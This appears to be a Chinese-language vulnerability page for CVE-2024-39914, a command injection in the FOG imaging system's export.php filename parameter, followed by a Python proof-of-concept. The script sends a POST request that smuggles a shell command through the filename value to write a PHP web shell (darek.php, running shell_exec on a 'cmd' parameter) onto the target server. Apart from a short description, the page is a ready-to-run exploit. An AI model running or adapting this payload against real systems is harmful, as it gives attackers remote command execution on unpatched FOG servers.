FOG命令注入漏洞(CVE-2024-39914)
漏洞描述
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
#!/usr/bin/env python3
import socket
import sys
rhost = '192.168.15.5'
rport = 80
webshell = 'darek.php' #lol
payload = f"""POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+{webshell})&type=pdf HTTP/1.1\r\nHost: {rhost}\r\nContent-Length: 21\r\nUser-Agent: ToxicPotato\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nfogguiuser=fog&nojson=2"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
sock.connect((rhost, rport))
except:
print(f'Could not reach {rhost}')
sys.exit(1)
sock.sendall(payload.encode())
data = sock.recv(1024)
print(data.decode())
评论 (0)